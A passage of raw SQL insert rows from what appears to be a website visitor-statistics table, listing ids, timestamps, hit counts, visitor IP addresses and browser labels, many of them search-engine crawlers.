,'other'),(233243,1523646977,1,1,0,0,'217.69.133.28','other'),(233244,1523647295,1,1,0,0,'37.55.151.186','chrome'),(233245,1523647394,2,2,0,0,'91.196.178.165','chrome'),(233246,1523647900,1,1,0,0,'193.106.30.99','firefox'),(233247,1523648149,1,1,0,0,'217.69.133.216','other'),(233248,1523648198,1,1,0,0,'91.196.178.93','firefox'),(233249,1523648415,2,2,0,0,'216.244.66.237','other'),(233250,1523648560,1,1,0,0,'217.69.133.230','other'),(233251,1523648786,1,1,0,0,'54.165.59.7','other'),(233252,1523648923,1,0,1,0,'66.249.66.156',''),(233253,1523649303,1,1,0,0,'141.8.142.74','other'),(233254,1523649525,1,1,0,0,'217.69.133.10','other'),(233255,1523649546,1,0,1,0,'66.249.66.195',''),(233256,1523650077,1,1,0,0,'217.69.133.85','other'),(233257,1523650555,1,1,0,0,'217.69.133.252','other'),(233258,1523650557,1,1,0,0,'217.69.133.248','other'),(233259,1523650965,1,1,0,0,'207.46.13.36','other'),(233260,1523651598,1,1,0,0,'54.165.59.7','other'),(233261,1523651981,1,1,0,0,'207.46.13.37','other'),(233262,1523652236,1,1,0,0,'180.76.15.156','other'),(233263,1523652314,1,0,1,0,'66.249.66.201',''),(233264,1523652440,1,1,0,0,'217.69.133.233','other'),(233265,1523652640,2,2,0,0,'193.106.30.99','firefox'),(233266,1523652673,1,1,0,0,'141.8.142.74','other'),(233267,1523653128,1,1,0,0,'217.69.133.218','other'),(233268,1523653281,1,1,0,0,'91.196.178.103','firefox'),(233269,1523653686,1,1,0,0,'217.69.133.31','other'),(233270,1523653910,1,1,0,0,'193.106.30.99','firefox'),(233271,1523655038,1,1,0,0,'216.244.66.237','other'),(233272,1523655480,1,0,1,0,'66.249.66.199',''),(233273,1523656175,1,1,0,0,'178.154.171.88','other'),(233274,1523656324,1,0,1,0,'66.249.66.195',''),(233275,1523656503,1,1,0,0,'217.69.133.12','other'),(233276,1523656870,1,1,0,0,'217.69.133.234','other'),(233277,1523656915,1,1,0,0,'141.8.142.74','other'),(233278,1523657419,2,2,0,0,'216.244.66.237','other'),(233279,1523657500,1,1,0,0,'8.29.198.25','other'),(233280,1523657859,1,1,0,0,'54.165.59.7','other'),(233281,1523658092,1,0,1,0,'66.249.66.201',''),(233282,1523659188,1,1,0,0,'178.154.171.88','other'),(233283,1523659357,1,1,0,0,'217.69.136.203','other'),(233284,1523660003,1,0,1,0,'66.249.66.199',''),(233285,1523660034,1,1,0,0,'193.106.30.99','firefox'),(233286,1523660042,1,1,0,0,'128.68.31.67','chrome'),(233287,1523660422,1,1,0,0,'178.154.171.88','other'),(233288,1523660452,1,1,0,0,'217.69.133.192','other'),(233289,1523661757,1,1,0,0,'217.69.133.193','other'),(233290,1523662289,1,1,0,0,'148.251.7.6','other'),(233291,1523662539,1,1,0,0,'216.244.66.237','other'),(233292,1523662950,1,1,0,0,'141.8.142.74','other'),(233293,1523663696,1,1,0,0,'178.154.171.88','other'),(233294,1523663970,1,1,0,0,'216.244.66.237','other'),(233295,1523664389,1,1,0,0,'217.69.133.216','other'),(233296,1523664458,1,1,0,0,'141.8.142.74','other'),(233297,1523664511,1,1,0,0,'217.69.133.70','other'),(233298,1523664964,1,1,0,0,'217.69.133.193','other'),(233299,1523665160,1,1,0,0,'217.69.133.59','other'),(233300,1523665434,1,1,0,0,'207.46.13.37','other'),(233301,1523665814,1,1,0,0,'217.69.133.222','other'),(233302,1523666242,1,1,0,0,'35.226.23.240','other'),(233303,1523666560,1,1,0,0,'217.69.133.31','other'),(233304,1523666567,1,1,0,0,'217.69.133.234','other'),(233305,1523666698,1,1,0,0,'178.154.171.88','other'),(233306,1523666996,1,1,0,0,'217.69.133.30','other'),(233307,1523667829,1,1,0,0,'40.77.167.1','other'),(233308,1523667862,1,1,0,0,'217.69.133.250','other'),(233309,1523668335,1,1,0,0,'8.29.198.25','other'),(233310,1523668419,1,1,0,0,'217.69.133.217','other'),(233311,1523669228,1,1,0,0,'141.8.142.74','other'),(233312,1523669816,1,1,0,0,'54.165.59.7','other'),(233313,1523669866,1,1,0,0,'216.244.66.237','other'),(233314,1523670607,1,1,0,0,'217.69.133.250','other'),(233315,1523670866,1,1,0,0,'217.69.133.192','other'),(233316,1523671627,1,0,1,0,'66.249.66.201',''),(233317,1523671773,1,1,0,0,'217.69.133.30','other'),(233318,1523671775,1,1,0,0,'217.69.133.59','other'),(233319,1523671887,1,1,0,0,'141.8.142.74','other'),(233320,1523672047,1,1,0,0,'66.249.66.157','chrome'),(233321,1523672053,1,1,0,0,'66.249.66.199','chrome'),(233322,1523674276,1,1,0,0,'62.4.15.41','chrome'),(233323,1523675933,1,1,0,0,'87.250.224.46','other'),(233324,1523676698,1,1,0,0,'217.69.133.14','other'),(233325,1523677542,1,1,0,0,'217.69.133.30','other'),(233326,1523677781,1,1,0,0,'217.69.133.228','other'),(233327,1523678191,1,1,0,0,'217.69.133.3','other'),(233328,1523678203,1,1,0,0,'217.69.134.176','other'),(233329,1523678210,2,2,0,0,'217.69.133.203','other'),(233330,1523678219,1,1,0,0,'217.69.133.194','other'),(233331,1523678225,1,1,0,0,'217.69.134.155','other'),(233332,1523678235,1,1,0,0,'217.69.134.227','other'),(233333,1523678281,1,1,0,0,'178.154.171.88','other'),(233334,1523678512,1,0,1,0,'66.249.66.199',''),(233335,1523678793,1,1,0,0,'217.69.133.229','other'),(233336,1523679127,1,1,0,0,'217.69.133.227','other'),(233337,1523679166,1,1,0,0,'8.29.198.25','other'),(233338,1523680239,1,0,1,0,'66.249.66.195',''),(233339,1523680412,1,0,1,0,'66.249.66.199',''),(233340,1523681255,1,1,0,0,'141.8.142.74','other'),(233341,1523682060,1,1,0,0,'217.69.133.249','other'),(233342,1523682911,1,0,1,0,'66.249.66.201',''),(233343,1523683151,1,1,0,0,'217.69.133.228','other'),(233344,1523683398,2,2,0,0,'217.69.133.30','other'),(233345,1523683429,1,1,0,0,'107.167.108.15','other'),(233346,1523683710,1,1,0,0,'217.69.133.238','other'),(233347,1523683824,1,1,0,0,'178.154.171.88','other'),(233348,1523684001,1,1,0,0,'217.69.133.233','other'),(233349,1523684003,1,1,0,0,'217.69.133.227','other'),(233350,1523684129,1,1,0,0,'54.165.59.7','other'),(233351,1523684604,1,0,1,0,'66.249.66.195',''),(233352,1523684666,2,2,0,0,'141.8.142.74','other'),(233353,1523684857,1,0,1,0,'66.249.66.158',''),(233354,1523685221,1,1,0,0,'217.69.133.14','other'),(233355,1523685364,2,2,0,0,'54.165.59.7','other'),(233356,1523685771,1,1,0,0,'141.8.142.74','other'),(233357,1523686832,1,1,0,0,'188.230.43.254','other'),(233358,1523687045,1,1,0,0,'141.8.142.74','other'),(233359,1523687231,1,1,0,0,'91.196.178.166','chrome'),(233360,1523687474,1,1,0,0,'216.244.66.237','other'),(233361,1523687720,1,1,0,0,'217.69.133.192','other'),(233362,1523687780,1,1,0,0,'217.69.133.15','other'),(233363,1523687782,1,1,0,0,'217.69.133.14','other'),(233364,1523689234,1,1,0,0,'188.230.43.254','other'),(233365,1523689298,1,1,0,0,'217.69.133.230','other'),(233366,1523689329,2,2,0,0,'216.244.66.237','other'),(233367,1523689532,1,1,0,0,'141.8.142.74','other'),(233368,1523689549,1,0,1,0,'66.249.66.199',''),(233369,1523689951,1,1,0,0,'217.69.133.231','other'),(233370,1523690002,1,1,0,0,'8.29.198.25','other'),(233371,1523690218,1,1,0,0,'217.69.133.192','other'),(233372,1523690222,1,1,0,0,'217.69.133.10','other'),(233373,1523690633,1,1,0,0,'217.69.133.230','other'),(233374,1523690751,1,1,0,0,'217.69.133.253','other'),(233375,1523690767,1,0,1,0,'66.249.66.199',''),(233376,1523691629,1,1,0,0,'188.230.43.254','other'),(233377,1523691798,1,1,0,0,'217.69.133.28','other'),(233378,1523692086,1,1,0,0,'141.8.142.74','other'),(233379,1523693297,1,0,1,0,'66.249.66.195',''),(233380,1523693493,1,1,0,0,'216.244.66.237','other'),(233381,1523693563,1,1,0,0,'217.69.133.250','other'),(233382,1523693565,1,1,0,0,'217.69.133.23','other'),(233383,1523694029,1,1,0,0,'188.230.43.254','other'),(233384,1523694051,2,2,0,0,'95.213.141.126','opera'),(233385,1523694788,1,1,0,0,'217.69.133.29','other'),(233386,1523694934,1,1,0,0,'217.69.133.218','other'),(233387,1523695025,1,1,0,0,'40.77.167.206','other'),(233388,1523695709,1,1,0,0,'46.211.115.248','chrome'),(233389,1523695933,1,1,0,0,'217.69.133.230','other'),(233390,1523696515,1,1,0,0,'178.154.171.88','other'),(233391,1523696604,1,0,1,0,'66.249.66.156',''),(233392,1523696760,1,1,0,0,'217.69.133.249','other'),(233393,1523697440,1,1,0,0,'217.69.133.59','other'),(233394,1523697834,1,1,0,0,'217.69.136.205','other'),(233395,1523698343,1,1,0,0,'216.244.66.237','other'),(233396,1523698866,2,2,0,0,'199.58.86.209','other'),(233397,1523699413,1,1,0,0,'91.204.196.164','chrome'),(233398,1523699814,1,1,0,0,'217.69.133.232','other'),(233399,1523700305,1,1,0,0,'217.69.133.229','other'),(233400,1523700837,1,1,0,0,'8.29.198.25','other'),(233401,1523701331,2,2,0,0,'141.8.142.74','other'),(233402,1523702001,1,1,0,0,'91.209.11.236','other'),(233403,1523702755,1,1,0,0,'217.69.133.229','other'),(233404,1523702804,1,0,1,0,'66.249.66.195',''),(233405,1523702843,1,1,0,0,'54.165.59.7','other'),(233406,1523703203,1,1,0,0,'141.8.142.74','other'),(233407,1523703752,1,1,0,0,'185.103.254.68','chrome'),(233408,1523704185,1,1,0,0,'216.244.66.237','other'),(233409,1523705585,2,2,0,0,'178.154.171.88','other'),(233410,1523706060,1,1,0,0,'217.69.133.230','other'),(233411,1523706499,1,1,0,0,'180.76.15.30','other'),(233412,1523706570,2,2,0,0,'217.69.133.239','other'),(233413,1523707029,1,0,1,0,'66.249.66.201',''),(233414,1523708016,8,8,0,0,'95.216.0.58','other'),(233415,1523710189,1,1,0,0,'91.209.11.236','other'),(233416,1523710344,1,0,1,0,'66.249.66.199',''),(233417,1523711215,1,1,0,0,'216.244.66.237','other'),(233418,1523711513,1,1,0,0,'141.8.142.74','other'),(233419,1523711672,1,1,0,0,'8.29.198.25','other'),(233420,1523712136,1,1,0,0,'188.230.43.254','other'),(233421,1523712554,1,0,1,0,'66.249.66.201',''),(233422,1523712849,1,1,0,0,'46.242.124.30','msie'),(233423,1523713201,1,0,1,0,'66.249.66.157',''),(233424,1523714205,1,1,0,0,'141.8.142.74','other'),(233425,1523714350,1,0,1,0,'66.249.66.199',''),(233426,1523714534,1,1,0,0,'188.230.43.254','other'),(233427,1523714570,1,1,0,0,'216.244.66.237','other'),(233428,1523715914,1,0,1,0,'66.249.66.195',''),(233429,1523717342,1,1,0,0,'217.69.133.252','other'),(233430,1523717498,1,1,0,0,'139.59.109.211','other'),(233431,1523718096,1,1,0,0,'141.8.142.74','other'),(233432,1523718916,3,3,0,0,'37.54.22.192','chrome'),(233433,1523719166,2,2,0,0,'141.8.142.74','other'),(233434,1523719688,1,1,0,0,'107.167.104.152','other'),(233435,1523720373,1,1,0,0,'180.76.15.154','other'),(233436,1523721195,1,0,1,0,'66.249.66.201',''),(233437,1523721375,1,1,0,0,'178.154.171.88','other'),(233438,1523721390,1,1,0,0,'141.8.142.74','other'),(233439,1523721857,1,0,1,0,'66.249.66.199',''),(233440,1523722500,1,1,0,0,'8.29.198.26','other'),(233441,1523722503,1,1,0,0,'216.244.66.237','other'),(233442,1523723548,1,1,0,0,'178.154.171.60','other'),(233444,1523723558,1,1,0,0,'157.55.39.49','other'),(233445,1523724687,1,1,0,0,'66.249.66.157','chrome'),(233446,1523724692,2,1,1,0,'66.249.66.201',''),(233447,1523725571,1,1,0,0,'217.69.136.205','other'),(233448,1523726071,1,0,1,0,'66.249.66.157',''),(233449,1523726294,2,2,0,0,'37.54.22.192','chrome'),(233450,1523726408,1,1,0,0,'207.154.217.187','chrome'),(233451,1523726919,182,182,0,0,'213.133.111.165','other'),(233452,1523726963,1,1,0,0,'216.244.66.237','other'),(233453,1523727418,2,2,0,0,'91.196.178.44','chrome'),(233454,1523727554,1,1,0,0,'178.154.171.88','other'),(233455,1523727564,1,1,0,0,'35.226.23.240','other'),(233456,1523729391,1,1,0,0,'37.73.222.219','chrome'),(233457,1523730601,1,0,1,0,'66.249.66.201',''),(233458,1523730704,1,1,0,0,'73.144.25.234','other'),(233459,1523730867,1,1,0,0,'107.167.104.235','other'),(233460,1523731415,3,3,0,0,'91.196.178.167','chrome'),(233461,1523731539,1,1,0,0,'87.250.224.46','other'),(233462,1523731825,1,1,0,0,'188.32.251.206','msie'),(233463,1523732015,1,0,1,0,'66.249.66.201',''),(233464,1523732435,1,1,0,0,'141.8.142.74','other'),(233465,1523733104,1,0,1,0,'66.249.66.157',''),(233466,1523733340,1,1,0,0,'8.29.198.27','other'),(233467,1523734025,1,0,1,0,'66.249.66.195',''),(233468,1523734320,2,2,0,0,'207.46.13.37','other'),(233469,1523734569,1,1,0,0,'141.8.142.74','other'),(233470,1523735119,1,1,0,0,'216.244.66.237','other'),(233471,1523735929,1,1,0,0,'217.69.133.236','other'),(233472,1523737106,1,1,0,0,'216.244.66.237','other'),(233473,1523737805,1,1,0,0,'217.69.133.249','other'),(233474,1523738218,1,1,0,0,'216.244.66.237','other'),(233475,1523738640,1,1,0,0,'66.249.66.195','chrome'),(233476,1523738680,1,1,0,0,'66.249.66.156','chrome'),(233477,1523739241,1,1,0,0,'213.180.203.7','other'),(233478,1523739689,1,1,0,0,'216.244.66.237','other'),(233479,1523740534,1,0,1,0,'66.249.66.158',''),(233480,1523742276,2,0,2,0,'66.249.66.195',''),(233481,1523743068,1,0,1,0,'66.249.66.199',''),(233482,1523743207,1,1,0,0,'216.244.66.237','other'),(233483,1523743558,1,1,0,0,'157.55.39.135','other'),(233484,1523744000,1,1,0,0,'217.69.133.4','other'),(233485,1523744035,1,1,0,0,'217.69.134.227','other'),(233486,1523744045,1,0,1,0,'66.249.66.199',''),(233487,1523744085,1,1,0,0,'217.69.134.174','other'),(233488,1523744171,1,1,0,0,'8.29.198.27','other'),(233489,1523744224,1,1,0,0,'207.46.13.115','other'),(233490,1523744800,1,1,0,0,'66.249.66.157','chrome'),(233491,1523744827,20,20,0,0,'88.99.19.242','other'),(233492,1523744885,2,2,0,0,'216.244.66.237','other'),(233493,1523745121,2,2,0,0,'141.8.142.74','other'),(233494,1523745419,1,1,0,0,'217.69.133.14','other'),(233495,1523745698,1,0,1,0,'66.249.66.199',''),(233496,1523747218,1,0,1,0,'66.249.66.195',''),(233497,1523747427,4,4,0,0,'195.154.243.51','other'),(233498,1523748770,1,1,0,0,'141.8.142.167','other'),(233499,1523748904,1,0,1,0,'66.249.66.156',''),(233500,1523749417,1,0,1,0,'66.249.66.158',''),(233501,1523749823,1,1,0,0,'141.8.142.74','other'),(233502,1523750571,1,1,0,0,'207.46.13.115','other'),(233503,1523751129,2,1,1,0,'66.249.66.195',''),(233504,1523751193,1,0,1,0,'66.249.66.158',''),(233505,1523751222,1,0,1,0,'66.249.66.199',''),(233506,1523751377,1,1,0,0,'66.249.66.156','chrome'),(233507,1523751838,1,1,0,0,'216.244.66.237','other'),(233508,1523754298,1,1,0,0,'217.69.133.244','other'),(233509,1523754751,1,1,0,0,'141.8.142.74','other'),(233510,1523755002,1,1,0,0,'8.29.198.26','other'),(233511,1523755026,2,2,0,0,'216.244.66.237','other'),(233512,1523755978,2,2,0,0,'216.244.66.237','other'),(233513,1523756623,1,1,0,0,'141.8.142.74','other'),(233514,1523756728,1,1,0,0,'66.249.66.201','chrome'),(233515,1523756774,2,1,1,0,'66.249.66.156',''),(233516,1523757606,1,1,0,0,'207.46.13.37','other'),(233517,1523758586,1,0,1,0,'66.249.66.156',''),(233518,1523759107,1,1,0,0,'35.226.23.240','other'),(233519,1523759607,1,1,0,0,'141.8.142.74','other'),(233520,1523759844,1,0,1,0,'66.249.66.195',''),(233521,1523760399,1,1,0,0,'35.226.23.240','other'),(233522,1523761003,1,1,0,0,'217.69.136.203','other'),(233523,1523761967,1,1,0,0,'178.154.171.88','other'),(233524,1523761973,2,2,0,0,'216.244.66.237','other'),(233525,1523762049,2,2,0,0,'141.8.142.74','other'),(233526,1523762116,1,1,0,0,'66.249.66.201','chrome'),(233527,1523762122,1,1,0,0,'66.249.66.156','chrome'),(233528,1523762332,23,23,0,0,'173.212.254.158','other'),(233529,1523762474,1,0,1,0,'66.249.66.199',''),(233530,1523763234,1,1,0,0,'141.8.142.74','other'),(233531,1523764996,1,1,0,0,'217.69.133.191','other'),(233532,1523765837,1,1,0,0,'8.29.198.25','other'),(233533,1523766194,1,1,0,0,'207.46.13.37','other'),(233534,1523767620,1,1,0,0,'66.249.66.199','chrome'),(233535,1523767865,1,1,0,0,'216.244.66.237','other'),(233536,1523768004,1,1,0,0,'157.55.39.38','other'),(233537,1523769224,1,0,1,0,'66.249.66.157',''),(233538,1523769300,1,0,1,0,'66.249.66.201',''),(233539,1523769362,1,1,0,0,'66.249.66.158','chrome'),(233540,1523769578,2,2,0,0,'216.244.66.237','other'),(233541,1523771050,1,1,0,0,'216.244.66.237','other'),(233542,1523771096,1,1,0,0,'217.69.133.248','other'),(233543,1523771290,1,1,0,0,'151.80.203.177','chrome'),(233544,1523771755,1,1,0,0,'217.69.133.221','other'),(233545,1523771917,1,1,0,0,'91.196.178.97','chrome'),(233546,1523772638,1,1,0,0,'216.244.66.237','other'),(233547,1523772818,1,1,0,0,'87.250.224.46','other'),(233548,1523772881,1,1,0,0,'91.196.178.38','chrome'),(233549,1523772933,1,1,0,0,'91.209.11.236','other'),(233550,1523772969,3,3,0,0,'207.46.13.52','other'),(233551,1523773446,1,1,0,0,'66.249.66.195','chrome'),(233552,1523774716,1,1,0,0,'141.8.142.74','other'),(233553,1523775140,1,1,0,0,'157.55.39.135','other'),(233554,1523775554,1,1,0,0,'151.80.203.177','other'),(233555,1523776458,1,0,1,0,'66.249.66.199',''),(233556,1523776663,1,1,0,0,'8.29.198.25','other'),(233557,1523776724,1,1,0,0,'178.154.171.88','other'),(233558,1523776752,1,0,1,0,'66.249.66.156',''),(233559,1523776775,1,1,0,0,'66.249.66.157','chrome'),(233560,1523776822,1,1,0,0,'217.69.133.238','other'),(233561,1523777134,1,1,0,0,'217.69.133.84','other'),(233562,1523778785,1,1,0,0,'217.69.133.223','other'),(233563,1523779614,2,0,2,0,'66.249.66.195',''),(233564,1523781051,1,1,0,0,'151.80.203.177','chrome'),(233565,1523781719,1,1,0,0,'66.249.66.199','chrome'),(233566,1523781848,1,1,0,0,'66.249.66.157','chrome'),(233567,1523782493,2,2,0,0,'108.59.8.70','other'),(233568,1523783497,1,1,0,0,'216.244.66.237','other'),(233569,1523784137,2,2,0,0,'37.54.22.192','chrome'),(233570,1523784257,1,1,0,0,'66.102.9.38','chrome'),(233571,1523784597,1,0,1,0,'66.249.66.158',''),(233572,1523784679,1,1,0,0,'151.80.203.177','other'),(233573,1523784770,1,1,0,0,'141.8.142.74','other'),(233574,1523785541,1,1,0,0,'46.161.9.30','chrome'),(233575,1523785602,1,1,0,0,'207.46.13.126','other'),(233576,1523786612,3,3,0,0,'141.8.142.74','other'),(233577,1523786903,1,1,0,0,'193.106.30.99','firefox'),(233578,1523787248,1,1,0,0,'217.69.133.217','other'),(233579,1523787493,1,1,0,0,'8.29.198.27','other'),(233580,1523787551,1,1,0,0,'66.249.66.157','chrome'),(233581,1523788733,1,1,0,0,'37.140.189.216','chrome'),(233582,1523788874,1,0,1,0,'66.249.66.201',''),(233583,1523788897,1,0,1,0,'66.249.66.156',''),(233584,1523789138,3,3,0,0,'141.8.142.74','other'),(233585,1523789799,1,1,0,0,'37.73.240.178','chrome'),(233586,1523791970,1,1,0,0,'178.93.201.156','chrome'),(233587,1523792608,1,1,0,0,'216.244.66.237','other'),(233588,1523793259,1,1,0,0,'195.54.42.24','chrome'),(233589,1523793484,1,1,0,0,'141.8.142.74','other'),(233590,1523794041,1,1,0,0,'109.248.9.241','chrome'),(233591,1523794052,1,1,0,0,'195.154.146.17','other'),(233592,1523794410,1,1,0,0,'216.244.66.237','other'),(233593,1523794600,1,1,0,0,'178.154.171.88','other'),(233594,1523794969,1,1,0,0,'141.8.142.74','other'),(233595,1523795671,1,1,0,0,'217.69.133.253','other'),(233596,1523796866,1,1,0,0,'141.8.142.74','other'),(233597,1523797524,1,1,0,0,'194.44.79.145','chrome'),(233598,1523797747,1,1,0,0,'54.165.59.7','other'),(233599,1523798327,1,1,0,0,'8.29.198.25','other'),(233600,1523799054,1,0,1,0,'66.249.66.199',''),(233601,1523799814,1,1,0,0,'207.46.13.126','other'),(233602,1523800427,1,1,0,0,'217.69.133.30','other'),(233603,1523800982,1,1,0,0,'46.161.9.30','firefox'),(233604,1523801322,1,1,0,0,'216.244.66.237','other'),(233605,1523801889,1,1,0,0,'180.76.15.8','other'),(233606,1523802391,1,1,0,0,'87.250.224.46','other'),(233607,1523803564,1,0,1,0,'66.249.66.157',''),(233608,1523804184,1,1,0,0,'217.69.133.192','other'),(233609,1523804315,1,1,0,0,'180.76.15.30','other'),(233610,1523804954,1,1,0,0,'94.244.167.42','chrome'),(233611,1523806367,1,1,0,0,'193.106.30.99','firefox'),(233612,1523806616,1,1,0,0,'206.189.120.81','other'),(233613,1523807642,1,1,0,0,'217.69.133.29','other'),(233614,1523809144,1,1,0,0,'95.132.12.58','chrome'),(233615,1523809168,1,1,0,0,'8.29.198.25','other'),(233616,1523809466,2,2,0,0,'88.99.19.242','other'),(233617,1523811393,1,1,0,0,'141.8.142.74','other'),(233618,1523814340,1,1,0,0,'91.203.164.154','firefox'),(233619,1523814531,2,2,0,0,'91.196.178.49','chrome'),(233620,1523814551,1,1,0,0,'157.55.39.38','other'),(233621,1523815084,1,1,0,0,'141.8.142.74','other'),(233622,1523815500,1,1,0,0,'87.250.224.46','other'),(233623,1523815504,2,2,0,0,'178.154.171.88','other'),(233624,1523817447,2,2,0,0,'37.54.22.192','chrome'),(233625,1523817683,1,1,0,0,'206.189.116.200','other'),(233626,1523818365,1,1,0,0,'46.185.2.145','chrome'),(233627,1523818520,1,1,0,0,'157.55.39.38','other'),(233628,1523820017,1,1,0,0,'8.29.198.26','other'),(233629,1523820237,1,1,0,0,'216.244.66.237','other'),(233630,1523820476,1,0,1,0,'66.249.66.195',''),(233631,1523821401,1,0,1,0,'66.249.66.199',''),(233632,1523821411,1,1,0,0,'216.244.66.237','other'),(233633,1523822156,1,1,0,0,'217.69.133.14','other'),(233634,1523822543,1,1,0,0,'216.244.66.237','other'),(233635,1523822801,1,1,0,0,'87.250.224.46','other'),(233636,1523823185,1,1,0,0,'66.249.66.195','chrome'),(233637,1523823799,1,1,0,0,'66.249.66.201','chrome'),(233638,1523823896,1,1,0,0,'178.154.171.88','other'),(233639,1523824344,1,1,0,0,'141.8.142.74','other'),(233640,1523824441,1,1,0,0,'157.55.39.135','other'),(233641,1523824674,1,1,0,0,'217.69.133.72','other'),(233642,1523824810,1,0,1,0,'66.249.66.199',''),(233643,1523825478,1,1,0,0,'193.106.30.99','firefox'),(233644,1523825922,3,3,0,0,'37.57.218.243','other'),(233645,1523826282,1,1,0,0,'46.161.9.30','firefox'),(233646,1523826635,3,3,0,0,'77.251.68.96','other'),(233647,1523827410,1,1,0,0,'141.8.142.74','other'),(233648,1523828689,1,1,0,0,'178.154.171.88','other'),(233649,1523830289,1,1,0,0,'207.46.13.37','other'),(233650,1523830850,1,1,0,0,'8.29.198.26','other'),(233651,1523831107,1,1,0,0,'141.8.142.74','other'),(233652,1523831232,1,0,1,0,'66.249.66.156',''),(233653,1523831736,1,1,0,0,'217.69.133.15','other'),(233654,1523831970,1,1,0,0,'217.69.133.67','other'),(233655,1523832119,1,1,0,0,'141.8.142.74','other'),(233656,1523833486,1,1,0,0,'217.69.133.190','other'),(233657,1523833500,1,0,1,0,'66.249.66.201',''),(233658,1523833737,1,1,0,0,'216.244.66.237','other'),(233659,1523834542,1,1,0,0,'66.249.66.195','chrome'),(233660,1523834777,1,1,0,0,'141.8.142.74','other'),(233661,1523835388,1,1,0,0,'157.55.39.197','other'),(233662,1523835599,1,1,0,0,'217.69.133.14','other'),(233663,1523836253,1,1,0,0,'141.8.142.74','other'),(233664,1523836526,1,1,0,0,'216.244.66.237','other'),(233665,1523836709,1,1,0,0,'217.69.133.72','other'),(233666,1523836862,1,0,1,0,'66.249.66.156',''),(233667,1523838589,1,1,0,0,'141.8.142.74','other'),(233668,1523838598,1,1,0,0,'193.106.30.99','firefox'),(233669,1523838918,1,1,0,0,'180.97.61.252','chrome'),(233670,1523839512,1,1,0,0,'46.161.9.30','chrome'),(233671,1523839853,1,1,0,0,'216.244.66.237','other'),(233672,1523840309,1,1,0,0,'217.69.133.226','other'),(233673,1523840853,1,1,0,0,'213.180.203.7','other'),(233674,1523840975,3,3,0,0,'216.244.66.237','other'),(233675,1523841012,1,1,0,0,'35.226.23.240','other'),(233676,1523841488,1,1,0,0,'217.69.133.12','other'),(233677,1523841684,1,1,0,0,'8.29.198.26','other'),(233678,1523842253,1,1,0,0,'216.244.66.237','other'),(233679,1523843604,1,1,0,0,'35.226.23.240','other'),(233680,1523844156,1,1,0,0,'216.244.66.237','other'),(233681,1523844748,1,1,0,0,'141.8.142.74','other'),(233682,1523845396,1,1,0,0,'66.249.66.201','chrome'),(233683,1523847006,1,1,0,0,'217.69.133.10','other'),(233684,1523847111,1,1,0,0,'95.216.11.233','other'),(233685,1523847128,2,2,0,0,'216.244.66.237','other'),(233686,1523847517,1,0,1,0,'66.249.66.195',''),(233687,1523847807,1,1,0,0,'141.8.142.74','other'),(233688,1523848750,1,1,0,0,'78.26.130.105','firefox'),(233689,1523848926,1,1,0,0,'66.249.66.199','chrome'),(233690,1523849512,1,1,0,0,'217.69.133.250','other'),(233691,1523850161,1,1,0,0,'141.8.142.74','other'),(233692,1523851401,1,1,0,0,'141.8.142.74','other'),(233693,1523851508,1,1,0,0,'178.154.171.88','other'),(233694,1523852517,1,1,0,0,'8.29.198.25','other'),(233695,1523854087,1,1,0,0,'207.46.13.189','other'),(233696,1523854598,1,1,0,0,'54.67.59.131','chrome'),(233697,1523855561,1,1,0,0,'217.69.133.190','other'),(233698,1523856215,1,1,0,0,'217.69.133.12','other'),(233699,1523856664,1,1,0,0,'80.70.77.135','chrome'),(233700,1523856911,1,1,0,0,'46.201.59.215','chrome'),(233701,1523857063,1,1,0,0,'141.8.142.74','other'),(233702,1523857120,1,1,0,0,'195.149.70.22','firefox'),(233703,1523857204,2,2,0,0,'216.244.66.237','other'),(233704,1523857784,2,2,0,0,'91.196.178.83','chrome'),(233705,1523858283,1,1,0,0,'91.196.178.90','chrome'),(233706,1523858550,2,2,0,0,'91.196.178.89','chrome'),(233707,1523858569,1,1,0,0,'217.69.133.14','other'),(233708,1523859002,1,1,0,0,'141.8.142.152','other'),(233709,1523859347,1,1,0,0,'91.196.178.14','firefox'),(233710,1523859490,1,1,0,0,'40.77.167.209','other'),(233711,1523859749,2,2,0,0,'194.37.248.11','chrome'),(233712,1523859828,1,1,0,0,'193.106.30.99','firefox'),(233713,1523860364,2,2,0,0,'91.196.178.65','chrome'),(233714,1523860396,2,2,0,0,'95.132.29.25','firefox'),(233715,1523860397,1,1,0,0,'82.207.49.46','firefox'),(233716,1523860659,1,1,0,0,'141.8.132.19','other'),(233717,1523860765,1,1,0,0,'194.37.248.11','chrome'),(233718,1523860969,1,1,0,0,'216.244.66.237','other'),(233719,1523861158,1,1,0,0,'37.55.227.37','chrome'),(233720,1523861637,3,3,0,0,'91.196.178.169','chrome'),(233721,1523861869,1,1,0,0,'91.196.178.97','chrome'),(233722,1523862049,1,1,0,0,'82.76.220.243','msie'),(233723,1523862388,2,2,0,0,'91.196.177.15','chrome'),(233724,1523862591,1,1,0,0,'217.69.133.70','other'),(233725,1523862846,1,1,0,0,'91.196.178.65','chrome'),(233726,1523862890,1,1,0,0,'40.77.167.69','other'),(233727,1523863319,1,1,0,0,'91.196.177.15','chrome'),(233728,1523863347,1,1,0,0,'8.29.198.26','other'),(233729,1523863615,1,1,0,0,'216.244.66.237','other'),(233730,1523864208,1,1,0,0,'37.53.123.20','chrome'),(233731,1523864503,1,1,0,0,'217.182.203.54','chrome'),(233732,1523864710,1,1,0,0,'216.244.66.237','other'),(233733,1523864797,2,2,0,0,'130.180.217.0','chrome'),(233734,1523864910,1,0,1,0,'66.249.66.199',''),(233735,1523865296,1,1,0,0,'141.8.132.19','other'),(233736,1523865660,1,1,0,0,'178.154.171.4','other'),(233737,1523866138,1,1,0,0,'213.180.203.7','other'),(233738,1523866253,1,1,0,0,'204.79.180.1','msie'),(233739,1523866303,1,1,0,0,'95.135.19.164','chrome'),(233740,1523866653,1,1,0,0,'216.244.66.237','other'),(233741,1523866831,1,1,0,0,'178.154.200.7','other'),(233742,1523867496,1,1,0,0,'91.209.11.236','other'),(233743,1523867544,1,1,0,0,'217.69.133.235','other'),(233744,1523868155,2,2,0,0,'216.244.66.237','other'),(233745,1523868352,1,1,0,0,'109.87.26.80','firefox'),(233746,1523869559,1,1,0,0,'217.69.133.238','other'),(233747,1523869633,1,1,0,0,'216.244.66.237','other'),(233748,1523869697,1,1,0,0,'37.9.113.114','other'),(233749,1523869982,1,1,0,0,'46.161.9.30','chrome'),(233750,1523870229,1,1,0,0,'91.209.11.236','other'),(233751,1523870521,2,2,0,0,'108.59.8.80','other'),(233752,1523870664,1,1,0,0,'216.244.66.237','other'),(233753,1523871289,1,1,0,0,'217.69.133.72','other'),(233754,1523871338,1,1,0,0,'193.106.30.99','firefox'),(233755,1523871353,1,1,0,0,'31.43.31.190','chrome'),(233756,1523871562,1,0